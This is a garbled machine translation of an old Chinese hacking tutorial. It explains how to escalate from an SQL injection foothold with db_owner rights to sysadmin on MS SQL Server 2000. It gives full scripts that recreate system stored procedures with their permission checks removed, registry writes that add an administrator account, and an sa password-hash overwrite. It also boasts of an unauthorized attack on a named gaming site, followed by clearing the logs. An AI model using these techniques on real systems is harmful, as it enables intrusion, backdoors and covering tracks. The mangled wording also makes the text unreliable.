----
Just give me a injection point, no matter what permissions, I will give you a WebShell or even system privileges.
Original: Xu Wenqiang (XWQ), QQ: 57133683
Disclaimer: This article is only used for teaching purposes, and if it is not responsible for the attack consequences of this article. because
It is found that it is too harmful, and the original text has been deleted and modified. Even this paper is still very
Big, so please do not do any destructive operations for the domestic site.
Considering the thirty, even decided to send it. This trick is poisoned, the range is wide, it can be said that as long as it is
Sign with SQL injection vulnerabilities, just use this method 99% to get WebShell or even system authority (not dare
Tell the words, huh, huh, I have hundreds of real "actual exercises", basically 100% can get
Webshell or even system privileges).
I remember that I wrote a kind of "MSSQL DB_OWNER role injecting directly to the system permission (continued)"
Method for obtaining system permissions using XP_REGWRITE: XP_REGWRITE
'HKEY_LOCAL_MACHINE', 'Software / Microsoft / Windows / CurrentVers Ion / Run', 'X
WQ1 ',' REG_SZ ',' NET USER XWQ XWQ / Add '
XP_Regwrite
'HKEY_LOCAL_MACHINE', 'Software / Microsoft / Windows / CurrentVers Ion / Run', 'X
WQ2 ',' REG_SZ ',' Net localgroup administrators xwq / add ', as long as the website is
The server will get system authority. After hundreds of true experiments, this method is not
Too practical, it is easy to attract the attention of the network management, and then DDoS is also a matter of violations (even good people),
Moving a lot of manpower to spend DDOS, material (see how much your broiler is pulling). So not feasible (
Unless you want to get the website you want to get it).
Oh, so much, you may see it is not impatient, good, this introduces me three major
One of the killing skills --- 万 万 提.
If a website exists, there is a SQL injection vulnerability, if this website is used with fixed server sysadmin rights
Limited users' connection (huh, popular point is SA, rookie can think so), huh, huh, want to take
To a WebShell or system authority can be said to be a thing, and it is easy to say, according to what I know,
Sysadmin authority should get 10 kinds of WebShell or system permissions, huh, huh, maybe more (even only
10 kinds), how to get Webshell or system privileges, I don't want to say more, think more than everyone
It's been cooked, but if a website is DB_OWNER permission? What do you do, how do you take a train?
Delivery limit, how to take WebShell (without uploading vulnerabilities and database backups), everyone may return back
Backup a shell, I remember that LCX is also in "MSSQL DB_OWNER Role Injection Direct Access System Permissions"
Said to pull "back the shell is just the theoretical stuff, if a WebShell has 20MB, can you use it?" Oh, if I tell you DB_OWNER get a WebShell or system right
The method of limiteding method and sysadmin permissions, what is wrong with you, is it a bit incredible?
Or is it me? (Do not believe in friends, don't look at the content below)
Oh, is it ticking, I can't wait to know, I am not talking, this
Tell everyone about one of my three mustache ---- 万 万 提 权 方法.
Before telling everyone, let's make an experiment first.
Experimental Environment WindowsXP SP1 SQL 2000 SP3, everyone follows me Step to Step, first of all new
User built a permission with db_owner, here I am XWQ (what is in the server role
Don't choose, hook DB_OWNER in the database role), ok, now we open the query analyzer for XWQ
After connecting, enter sp_addlogin xuwenqiang, do it, what to pull?
Server: Message 2571, Level 14, State 2, Process SP_ADDLOGIN, line 16
User 'XWQ' does not run the permissions of DBCC AUDITEVENT.
Server: Message 15247, Level 16, State 1, Process SP_ADDLOGIN, Row 17
The user does not perform the permissions of this.
Oh, the above error message appears is normal, because only sysadmin and securityadmin solid
The member of the server role can execute sp_addlogin, so how can I make sp_addlogin for me?
Use? Let's take a look at sp_addlogin's code:
Create Procedure SP_ADDLOGIN
@loginame sysname
, @ passwd sysname = null
@ Defdb ;; sysname = 'master' - undone: default
Configurable???
, @ Deflanguage Sysname = NULL
, @ Sid Varbinary (16) = null
, @ encryptopt varchar (20) = NULL
AS
- Setup runtime options / declare variables -
Set nocount on
Declare @ret Int - Return Value of SP Call
- Check permissions -
IF (NOT IS_SRVROLEMEMBER ('SecurityAdmin') = 1)
Begin
DBCC Auditevent (104, 1, 0, @loginame, null, null, @SID)
Raiserror (15247, -1, -1)
Return (1)
end
Else
Begin
DBCC Auditevent (104, 1, 1, @loginame, null, null, @SID)
end
- Disallow User Transaction -
Set Implicit_Transactions Off
IF (@@ TRANCOUNT> 0) Begin
Raiserror (15002, -1, -1, 'sp_addlogin ")
Return (1)
end
- Validate Login Name As:
- (1) Valid SQL Name (SQL Login)
- (2) No backslash (NT Users ONLY)
- (3) Not a reserved login name
Execute @ret = sp_validname @loginame
IF (@RET <> 0)
Return (1)
IF (Charindex ('/', @Loginame> 0)
Begin
Raiserror (15006, -1, -1, @ loginame)
Return (1)
end
--Note: Different Case Sa is allowed.
IF (@loginame = 'sa' or limited "in ('public'))
Begin
Raiserror (15405, -1, -1, @loginame)
Return (1)
end
- Login Name Must Not Already EXIST -
IF exists (Select * from master.dbo.syslogins where loginname =
@loginame)
Begin
Raiserror (15025, -1, -1, @ loginame)
Return (1)
end
- Validate Default Database -
IF db_id (@Defdb) is null
Begin
Raiserror (15010, -1, -1, @ DEFDB)
Return (1)
end
- Validate Default Language -
IF (@Deflanguage is not null)
Begin
Execute @ret = sp_validlang @Deflanguage
IF (@RET <> 0)
Return (1)
end
Else
Begin
Select @deflanguage = name from master.dbo.syslanguages
Where langid = @@ default_langid - Server Default
Language
IF @deflanguage is null
SELECT @deflanguage = n'us_ENGLISH '
end
- Validate Sidiff Given -
IF ((@sid is not null) and (datalength (@SID) <> 16))))
Begin
Raiserror (15419, -1, -1)
Return (1)
end
Else if @SID is Null
Select @SID = newid ()
IF (SUSER_SNAME (@SID) IS not null)
Begin
Raiserror (15433, -1, -1)
Return (1)
end
- Validate and use encryption option -
Declare @XSTATUS Smallint
SELECT @xstatus = 2 - Access
IF @encryptopt is nullselect @passwd = pwndencrypt (@passwd)
Else if @Encryptopt = 'Skip_encryption_OLD'
Begin
SELECT @xstatus = @xstatus | 0x800, - Old-Style
ENCRYPTION
@Passwd = Convert (Sysname, Convert (Varbinary
(30), Convert (varchar (30), @passwd))))))
end
Else if @Encryptopt <> Skip_Encryption '
Begin
Raiserror (15600, -1, -1, 'sp_addlogin ")
Return 1
end
- Attempt the insert of the new login -
INSERT INTO MASTER.DBO.SYSXLOGINS VALUES
(Null, @SID, @XSTATUS, GETDATE (),
Getdate (), @Loginame, Convert (Varbinary (256), @passwd,
DB_ID (@Defdb), @Deflanguage)
IF @@ error <> 0 - this indeicates we cut duplicate row
Return (1)
- Update Protection TimeStamp for Master DB, TO INDICATE
Syslogins Change -
Exec ('use master grant all to null')
- Finalization: Return Success / Failure -
Raiserror (15298, -1, -1)
Return (0) - SP_ADDLOGIN
Go
The reason why only sysadmin and securityadmin fixed server roles can be implemented
SP_ADDLOGIN, mainly here to make a ghost
- Check permissions -
IF (NOT IS_SRVROLEMEMBER ('SecurityAdmin') = 1)
Begin
DBCC Auditevent (104, 1, 0, @loginame, null, null, @SID)
Raiserror (15247, -1, -1)
Return (1)
end
Else
Begin
DBCC Auditevent (104, 1, 1, @loginame, null, null, @SID)
end
As long as we delete this code, users of any permissions can increase user pull.
Ok, let's take sp_addlogin first.
Drop Procedure SP_ADDLOGIN
Then recover sp_addlogin
Create Procedure SP_ADDLOGIN
@loginame sysname
, @ passwd sysname = null
@ Defdb ;; sysname = 'master' - undone: default
Configurable???
, @ Deflanguage Sysname = NULL
, @ Sid Varbinary (16) = null
, @ encryptopt varchar (20) = NULL
AS
- Setup runtime options / declare variables --set NoCount on
Declare @ret Int - Return Value of SP Call
- Disallow User Transaction -
Set Implicit_Transactions Off
IF (@@ TRANCOUNT> 0)
Begin
Raiserror (15002, -1, -1, 'sp_addlogin ")
Return (1)
end
- Validate Login Name As:
- (1) Valid SQL Name (SQL Login)
- (2) No backslash (NT Users ONLY)
- (3) Not a reserved login name
Execute @ret = sp_validname @loginame
IF (@RET <> 0)
Return (1)
IF (Charindex ('/', @Loginame> 0)
Begin
Raiserror (15006, -1, -1, @ loginame)
Return (1)
end
--Note: Different Case Sa is allowed.
IF (@loginame = 'sa' or limited "in ('public'))
Begin
Raiserror (15405, -1, -1, @loginame)
Return (1)
end
- Login Name Must Not Already EXIST -
IF exists (Select * from master.dbo.syslogins where loginname =
@loginame)
Begin
Raiserror (15025, -1, -1, @ loginame)
Return (1)
end
- Validate Default Database -
IF db_id (@Defdb) is null
Begin
Raiserror (15010, -1, -1, @ DEFDB)
Return (1)
end
- Validate Default Language -
IF (@Deflanguage is not null)
Begin
Execute @ret = sp_validlang @Deflanguage
IF (@RET <> 0)
Return (1)
end
Else
Begin
Select @deflanguage = name from master.dbo.syslanguages
Where langid = @@ default_langid - Server Default
Language
IF @deflanguage is null
SELECT @deflanguage = n'us_ENGLISH '
end
- Validate Sidiff Given -
IF ((@sid is not null) and (datalength (@SID) <> 16))))
Begin
Raiserror (15419, -1, -1)
Return (1)
end
Else if @SID is Null
Select @SID = newid ()
IF (SUSER_SNAME (@SID) is not null, begin
Raiserror (15433, -1, -1)
Return (1)
end
- Validate and use encryption option -
Declare @XSTATUS Smallint
SELECT @xstatus = 2 - Access
IF @encryptopt is null
SELECT @Passwd = pwndencrypt (@passwd)
Else if @Encryptopt = 'Skip_encryption_OLD'
Begin
SELECT @xstatus = @xstatus | 0x800, - Old-Style
ENCRYPTION
@Passwd = Convert (Sysname, Convert (Varbinary
(30), Convert (varchar (30), @passwd))))))
end
Else if @Encryptopt <> Skip_Encryption '
Begin
Raiserror (15600, -1, -1, 'sp_addlogin ")
Return 1
end
- Attempt the insert of the new login -
INSERT INTO MASTER.DBO.SYSXLOGINS VALUES
(Null, @SID, @XSTATUS, GETDATE (),
Getdate (), @Loginame, Convert (Varbinary (256), @passwd,
DB_ID (@Defdb), @Deflanguage)
IF @@ error <> 0 - this indeicates we cut duplicate row
Return (1)
- Update Protection TimeStamp for Master DB, TO INDICATE
Syslogins Change -
Exec ('use master grant all to null')
- Finalization: Return Success / Failure -
Raiserror (15298, -1, -1)
Return (0) - SP_ADDLOGIN
Go
So I only increase the user pull, OK, in Query Analyzer
Inside the sp_addlogin xuwenqiang, do it, good! Return to have created a new login.
I created a user Xuwenqiang, of course, I am not white, I have to turn him into
Users with the highest permissions, of course, sysadmin pulling in SQL, and change a user
Sysadmin only sp_addsrvrolemember this stored procedure, but only sysadmin privileges
Users can use it, unhappy, even let him use me, huh, huh, huh, smart readers must think of how to pull me
Let me only have DB_OWNER privilege, how to use sp_addsrvrolemember, yes, and let
SP_ADDLOGIN is the same as the method I have, as long as the SP_ADDSRVROLEMEMBER is limited
For a while, we can add sysadmin pull, let's take a look at the code of sp_addsrvrolemember.
: CREATE Procedure SP_ADDSRVROLEMEMBER @ loginame sysname, - login name
@RoleName Sysname = Null - Server Role Name
AS
- Setup runtime options / declare variables -
Set nocount on
Declare @ret Int, - Return Value of SP Call
@Rolebit Smallint,
@isMem Int
- Disallow User Transaction -
Set Implicit_Transactions Off
IF (@@ TRANCOUNT> 0)
Begin
Raiserror (15002, -1, -1, 'sp_addsrvrolemember')
Return (1)
end
- Validate Server Role Name, Checking Permissions -
SELECT @ismem = is_srvrolemember (@roleName)
IF @ismem is null
Begin
DBCC Auditevent (108, 1, 0, @loginame, null, @ROLENAME,
NULL)
Raiserror (15402, -1, -1, @ropename)
Return (1)
end
IF @ismem = 0
Begin
DBCC Auditevent (108, 1, 0, @loginame, null, @ROLENAME,
NULL)
Raiserror (15247, -1, -1)
Return (1)
end
- Audit A Successful Security CHECK -
DBCC Auditevent (108, 1, 1, @loginame, null, @roleName, NULL)
- Cannot Change Sa Roles -
IF @loginame = 'sa'
Begin
Raiserror (15405, -1, -1, @loginame)
Return (1)
end
- Obtain the bit for this role -
Select @Rolebit = Case @roleName
When 'sysadmin' Ten 16
When 'securityAdmin' Then 32
When 'ServerAdmin' Ten 64
When 'setupadmin' Then 128
When 'processadmin' Then 256
When 'DiskAdmin' Then 512
When 'dbcreator' Then 1024
When 'bulkadmin' Then 4096
Else Null End
- Add row for nt login if needed -
IF not exists (SELECT * from master.dbo.syslogins where
Loginname = @loginame)
Begin
Execute @ret = sp_msaddlogin_implicit_ntlogin @loginame
IF (@RET <> 0)
Begin
Raiserror (15007, -1, -1, @ loginame) Return (1)
end
end
- Update Role MEMBERSHIP -
Update master.dbo.sysxlogins set xstatus = xstatus | @Rolebit,
XDATE2 = getdate ()
Where name = @loginame and srvid is Null
- Update Protection TimeStamp for Master DB, TO INDICATE
Syslogins Change -
Exec ('use master grant all to null')
Raiserror (15488, -1, -1, @ loginame, @ rolename)
- Finalization: Return Success / Failure
Return (@@ Error) - sp_addsrvroleMember
Go
Remove this paragraph - Validate Server Role Name, Checking Permissions -
SELECT @ismem = is_srvrolemember (@roleName)
IF @ismem is null
Begin
DBCC Auditevent (108, 1, 0, @loginame, null, @ROLENAME,
NULL)
Raiserror (15402, -1, -1, @ropename)
Return (1)
end
IF @ismem = 0
Begin
DBCC Auditevent (108, 1, 0, @loginame, null, @ROLENAME,
NULL)
Raiserror (15247, -1, -1)
Return (1)
end
In this way, we can arbitrarily add sysadmin, huh, huh, cool. Enter in the query analyzer
sp_addsrvrolemember Xuwenqiang, sysadmin, yeah !!!!!!!! successfully pulled. Here we are here
Successfully uses users who have only DB_OWNER privileges to create a high-level no-permission in SQL
, That is, user xuwenqiang with sysadmin permissions, with a sysadmin permission wants WebShell or
Is it not easy to system permissions! Don't just put your eyes only on what I said, SP_Addlogin and
SP_ADDSRVROLEMEMBER These two stored procedures, only Sysadmin uses stored procedures
, Use my universal proposal to kill the skills, we can use it. For example: SP-
Configure, sp_addlinkedServer, sp_addlinkedsrvlogin, sp_makewebtask, etc. very
We can make them use me more than SYSADMIN permission.
Let's take an example of a universal proportion
Create a back door that will never be killed and perfect.
We all know that there is a user who is called the back door in SQL, that is, SA, sa is a built-in administrator
Log in and cannot be changed and deleted. Oh, this is M $ saying, if you have seen another one I wrote
Article "Completely deleting SA this back door" knows that in fact, SA is also deleted. We know that in SQL
With the modified memory process, there is sp_password, but we must know the old password for the user to change.
Can change, then there is no way to change the password of the SA without knowing the old password? Yes, in fact
That is, using sp_configure, the functionality of sp_configure is to display or change the global configuration settings for the current server. SP_CONFIGURE (Change Configuration Options) Enforcement License Permissions Awarded Sysadmin by default
And ServerAdmin fixed server roles. This is easy to check the permissions in sp_configure
Segment delete, rebuild, we will use it.
Create Procedure SP_CONFIGURE --- 1996/08/14 09:43
@Configname Varchar (35) = null - Option Name To Configure
, @ configValue int = null - New Configuration Value
AS
Set nocount on
Declare
@Confignum int --Num of the opt to be configured
, @ confount int --num of options like @configname
, @ Show_advance Int --y / N Read & Write Actions ON
Advanced "OPTS
Declare @fullconfigname varchar (35)
Declare @PREVVALUE INT
/ *
** Determine @maxNumber based on advance Option in syscurconfigs.
* /
IF (Select Value from Master.dbo.syscurconfigs Where config = 518) = 1
SELECT @show_advance = 1 - Display Advanced Options
Else
SELECT @show_advance = 0 - DON 'T Display Advanced Options
/ *
** make Certain That Max User Info. Reflects Any AddPak Upgrades.
* /
IF (select high from master.dbo.spt_values where number = 103 and
TYPE = 'c')
<> @@max_connections
Update master.dbo.spt_values
SET high = @@ max_connections
WHERE NUMBER = 103
And type = 'c'
/ *
** if no option name is given, The Procedure Will Just Print Out All ALL
THE
** Options and their values.
* /
IF @configname is null
Begin
Select Name, Minimum = low, maximum = high,
Config_Value = C.Value,
Run_Value = master.dbo.syscurconfigs.value
From master.dbo.spt_values, master.dbo.sysconfigures c,
Master.dbo.syscurconfigs
WHERE TYPE = 'c'
And Number = C.config
And Number = Master.dbo.syscurconfigs.configand
((C.Status & 2 <> 0 and @show_advance = 1)
Oral
(C.Status & 2 = 0)
)
Order by Lower (Name)
Return (0)
end
/ *
** Use @Configname and try to find the right option.
** if There isn't Just One, Print Appropriate Diagnostics and return.
* /
Select @configcount = count (*), @fullconfigname = min (v.name),
@PREVVALUE = MIN (C.Value)
From master.dbo.spt_values v, master.dbo.sysconfigures c
WHERE V.NAME LIKE '%' @configname '%' and v.type = 'c'
And v.number = c.config
and
((C.Status & 2 <> 0 and @show_advance = 1)
Oral
(C.Status & 2 = 0)
)
/ *
** if no option, show the user what the Options is.
* /
IF @configcount = 0
Begin
Raiserror (15123, -1, -1, @ configname)
PRINT ''
Raiserror (15456, -1, -1)
/ *
** Show the user what the Options Are.
* /
Select Name, Minimum = low, maximum = high,
Config_Value = C.Value,
Run_Value = master.dbo.syscurconfigs.value
From master.dbo.spt_values, master.dbo.sysconfigures c,
Master.dbo.syscurconfigs
WHERE TYPE = 'c'
And Number = C.config
And Number = Master.dbo.syscurconfigs.config
and
((C.Status & 2 <> 0 and @show_advance = 1)
Oral
(C.Status & 2 = 0)
)
Return (1)
end
/ *
** if more Than One option Like @configname, Show the duplicates and
Return.
* /
IF @configcount> 1
Begin
Raiserror (15124, -1, -1, @ configname)
PRINT ''
Select Duplicate_Options = Name
From master.dbo.spt_values, master.dbo.sysconfigures c
WHERE Name Like '%' @configname '%' and type = 'c'
And Number = C.config
and
((C.Status & 2 <> 0 and @show_advance = 1)
Oral
(C.Status & 2 = 0)
)
Return (1)
end
Else
/ * There Must Be Exactly One, SO Get The Full Name. * /
SELECT @configname = name -, @ value_in_sysconfigure = C.Value
From master.dbo.spt_values, master.dbo.sysconfigures c
WHERE Name Like '%' @configname '%' and type = 'c'
And Number = C.config
and
((C.Status & 2 <> 0 and @show_advance = 1)
Oral
(C.Status & 2 = 0)
)
/ *
** if @configvalue is null, Just Show The Current State of The Option.
* /
IF @ConfigValue is Null
Begin
Select v.name
, v.low as 'minimum'
, v.high as 'maximum'
, C.Value as 'config_value'
, u.value as 'run_value'
From
Master.dbo.spt_values v left outer Join
Master.dbo.sysconfigures c on v.number = c.config
Left outer Join
Master.dbo.syscurconfigs u on v.number = u.config
WHERE
v.type = 'c'
And v.name like '%' @Configname '%'
and
((C.Status & 2 <> 0 and @show_advance = 1)
Oral
(C.Status & 2 = 0)
)
Return (0)
end
/ *
** Now Get The Configuration Number.
* /
SELECT @confignum = Number
From master.dbo.spt_values, master.dbo.sysconfigures c
WHERE TYPE = 'c'
And (@configvalue between low and high or @configvalue = 0)
And name Like '%' @configname '%'
And Number = C.config
and
((C.Status & 2 <> 0 and @show_advance = 1)
Oral
(C.Status & 2 = 0)))
/ *
** if this is the number of default logage, we want to make sure
** That The New Value IS A Valid Language ID in Syslanguages.
* /
IF @confignum = 124
Begin
IF not exists (Select * from master.dbo.syslanguages
Where langid = @ConfigValue)
Begin
/ * 0 Is default language, us_english * /
IF @ConfigValue <> 0
Begin
Raiserror (15127, -1, -1)
Return (1)
end
end
end
/ *
** if this is the number of kernel language, we want to make sure
** That The New Value IS A Valid Language ID in Syslanguages.
* /
IF @confignum = 132
Begin
IF not exists (Select * from master.dbo.syslanguages
Where langid = @ConfigValue)
Begin
/ * 0 Is default language, us_english * /
IF @ConfigValue <> 0
Begin
Raiserror (15028, -1, -1)
Return (1)
end
end
end
/ *
** "User Options" SHOULD NOT TRY TO SET INCOMPATIBLE OPTIONS / VALUES.
* /
IF @confignum = 1534 - "User Options"
Begin
IF (@ConfigValue & (1024 2048) = (1024 2048)) -
ANSI_NULL_DEFAULT_ON / OFF
Begin
Raiserror (15303, -1, -1, @ configValue)
Return (1)
end
end
/ *
** although the @Configname is good, @configvalue wasn't in in.
* /
IF @confignum is null
Begin
Raiserror (15129, -1, -1, @ configvalue, @ configname)
Return (1)
end
- MSG 15002, But in 6.5 Allow this Inside a TXN (Not Check @@ TRANCOUNT)
# 12828.
/ *
** Now Update Sysconfigures.
* /
Update master.dbo.sysconfigure set value = @configvalue
Where config = @Confignum
/ *
** Flush The Procedure Cache - this is to account for options?
Become
** Effective Immediately (IE. Dont NEED A Server Restart).
* /
DBCC FreeProccache
Raiserror (15457, -1, -1, @ffullconfigname, @PREVVALUE, @configvalue) withlog
Return (0) - SP_CONFIGURE
Go
OK, we will
sp_configure 'allow updates', 1
Go
Reconfigure with override
Go
It's so good to change the password of the SA. Then Update Sysxlogins Set
Password = 0x0100AB01431E944AA50CBB30267F53B9451B7189CA67AF19A 1FC944AA50C
BB30267F53B9451B7189CA67AF19A1FC WHERE SID = 0x01, such SA's password is changed
Set of 111111. Oh, the solution to the solution is to delete the sa. How to delete you "
Full delete SA this back door. "
Example:
The following is a good-time attack test for a domestic and very famous site to carry out the top knowledge.
A probably verified, for many factors, etc., we call this site to www. ** 173.com.
Www. ** 173.com This site is very famous on the game, ranking 20 in the top (I was tested at the time)
Here I don't want to say how I found the injection point, you can still find it, or have a lot (whole test
Try really spending a lot of time, don't misunderstand, I don't say time spending on "testing", but all
Write the program in the process, do not write a sample-style program, how can I make me what you want? The whole attack is only 10 points
There is less than a clock.
In the found injection point GameType = ** (depressed, if there is NBSI2 when testing, it is possible
To be relaxed, you can enter Drop Procedure SP_ADDLOGIN first, then enter (huh, you,
Of course, I am in the program I wrote.
Create Procedure SP_ADDLOGIN
@loginame sysname
, @ passwd sysname = null
@ Defdb ;; sysname = 'master' - undone: default
Configurable???
, @ Deflanguage Sysname = NULL
, @ Sid Varbinary (16) = null
, @ encryptopt varchar (20) = NULL
AS
- Setup runtime options / declare variables -
Set nocount on
Declare @ret Int - Return Value of SP Call
- Disallow User Transaction -
Set Implicit_Transactions Off
IF (@@ TRANCOUNT> 0)
Begin
Raiserror (15002, -1, -1, 'sp_addlogin ")
Return (1)
end
- Validate Login Name As:
- (1) Valid SQL Name (SQL Login)
- (2) No backslash (NT Users ONLY)
- (3) Not a reserved login name
Execute @ret = sp_validname @loginameif (@ret <> 0)
Return (1)
IF (Charindex ('/', @Loginame> 0)
Begin
Raiserror (15006, -1, -1, @ loginame)
Return (1)
end
--Note: Different Case Sa is allowed.
IF (@loginame = 'sa' or limited "in ('public'))
Begin
Raiserror (15405, -1, -1, @loginame)
Return (1)
end
- Login Name Must Not Already EXIST -
IF exists (Select * from master.dbo.syslogins where loginname =
@loginame)
Begin
Raiserror (15025, -1, -1, @ loginame)
Return (1)
end
- Validate Default Database -
IF db_id (@Defdb) is null
Begin
Raiserror (15010, -1, -1, @ DEFDB)
Return (1)
end
- Validate Default Language -
IF (@Deflanguage is not null)
Begin
Execute @ret = sp_validlang @Deflanguage
IF (@RET <> 0)
Return (1)
end
Else
Begin
Select @deflanguage = name from master.dbo.syslanguages
Where langid = @@ default_langid - Server Default
Language
IF @deflanguage is null
SELECT @deflanguage = n'us_ENGLISH '
end
- Validate Sidiff Given -
IF ((@sid is not null) and (datalength (@SID) <> 16))))
Begin
Raiserror (15419, -1, -1)
Return (1)
end
Else if @SID is Null
Select @SID = newid ()
IF (SUSER_SNAME (@SID) IS not null)
Begin
Raiserror (15433, -1, -1)
Return (1)
end
- Validate and use encryption option -
Declare @XSTATUS Smallint
SELECT @xstatus = 2 - Access
IF @encryptopt is null
SELECT @Passwd = pwndencrypt (@passwd)
Else if @Encryptopt = 'Skip_encryption_OLD'
Begin
SELECT @xstatus = @xstatus | 0x800, - Old-Style
ENCRYPTION
@Passwd = Convert (Sysname, Convert (Varbinary (30), Convert (varchar (30), @passwd)))
end
Else if @Encryptopt <> Skip_Encryption '
Begin
Raiserror (15600, -1, -1, 'sp_addlogin ")
Return 1
end
- Attempt the insert of the new login -
INSERT INTO MASTER.DBO.SYSXLOGINS VALUES
(Null, @SID, @XSTATUS, GETDATE (),
Getdate (), @Loginame, Convert (Varbinary (256), @passwd,
DB_ID (@Defdb), @Deflanguage)
IF @@ error <> 0 - this indeicates we cut duplicate row
Return (1)
- Update Protection TimeStamp for Master DB, TO INDICATE
Syslogins Change -
Exec ('use master grant all to null')
- Finalization: Return Success / Failure -
Raiserror (15298, -1, -1)
Return (0) - SP_ADDLOGIN
Go
OK, we will build an user exec master..sp_addlogin xwq
Drop Procedure SP_ADDSRVROLEMEMBER, then entered in IE
Create Procedure SP_ADDSRVROLEMEMBER
@loginame sysname, - login name
@RoleName Sysname = Null - Server Role Name
AS
- Setup runtime options / declare variables -
Set nocount on
Declare @ret Int, - Return Value of SP Call
@Rolebit Smallint,
@isMem Int
- Disallow User Transaction -
Set Implicit_Transactions Off
IF (@@ TRANCOUNT> 0)
Begin
Raiserror (15002, -1, -1, 'sp_addsrvrolemember')
Return (1)
end
- Cannot Change Sa Roles -
IF @loginame = 'sa'
Begin
Raiserror (15405, -1, -1, @loginame)
Return (1)
end
- Obtain the bit for this role -
Select @Rolebit = Case @roleName
When 'sysadmin' Ten 16
When 'securityAdmin' Then 32
When 'ServerAdmin' Ten 64
When 'setupadmin' Then 128
When 'processadmin' Then 256
When 'DiskAdmin' Then 512
When 'dbcreator' Then 1024when 'bulkadmin' TEN 4096
Else Null End
- Add row for nt login if needed -
IF not exists (SELECT * from master.dbo.syslogins where
Loginname = @loginame)
Begin
Execute @ret = sp_msaddlogin_implicit_ntlogin @loginame
IF (@RET <> 0)
Begin
Raiserror (15007, -1, -1, @ loginame)
Return (1)
end
end
- Update Role MEMBERSHIP -
Update master.dbo.sysxlogins set xstatus = xstatus | @Rolebit,
XDATE2 = getdate ()
Where name = @loginame and srvid is Null
- Update Protection TimeStamp for Master DB, TO INDICATE
Syslogins Change -
Exec ('use master grant all to null')
Raiserror (15488, -1, -1, @ loginame, @ rolename)
- Finalization: Return Success / Failure
Return (@@ Error) - sp_addsrvroleMember
Go
Then exec masser..sp_addsrvrolemember xwq, sysadmin
We take SQL Comprehensive Utilization Tools or Query Analyzers to connect, huh, huh, success, so we are
Www. ** 17173.com servers to build a user with the highest permissions XWQ pull, the following things I think
Everyone should go back. Oh, because it is just a security test, I have not going deeply, and I will delete the account.
To clear the log, flash.
Seeing pulling, one of my killing skills - the power of universal rights, as long as I give me an injection point,
No matter what permissions, I will give you a WebShell or even system privileges. Oh, in fact, the ability to improve
The permissions method is indeed a bit exaggerated, because Create Procedure's permissions awarded Sysadmin
Fixed server role members and DB_OWNER and DB_DDLADMIN fixed database role members, you want
When you meet the permissions of public, it is not good to use.
But don't think it is converted to public permissions, there is no way to get WebShell or system authority, just right
Instead, there are at least five ways to get WebShell or even system privileges according to the user knows that Public permissions.
The best prevention method is to eliminate injection vulnerabilities, this is the solution to the rules and cure. (Oh,
It is me that it is best not to give it, but it is no longer lower than public privileges.
Pull, no way to call public or use a lot of dangerous stored procedures, and public can't
Go, it seems that M is for us "bad people" is still very loved.)
postscript
This article is that I have used the studies in the school since I installed SQL in April 2004, I wrote at the beginning of December.
After that, I have never been released because of the harm too much. I believe that some people know in China. Just not open. After three considerations, I decided to release it. I hope everyone will master it, don't give domestic sites.
Do any destructive operation.
In this article, I didn't mention how the public permissions of public privileges got WebShell or system permissions.
According to the user who knows public permissions, the user gets at least five of Webshell or even system privileges (even currently
Only 5 kinds, there may be more ways, if it is more masters, I hope I can enlighten me, I will thank you first.
Pull)
An appropriate timing, I will dedicate the knowledge I have mastered to everyone to reiterate again. Do not destroy any legal hosts in any country, otherwise the consequences are at your own risk.
(Welcome to reprint, please keep the integrity of the article)
Animation download
http://soft.hackbase.com/view.asp?id=20050219db.zip
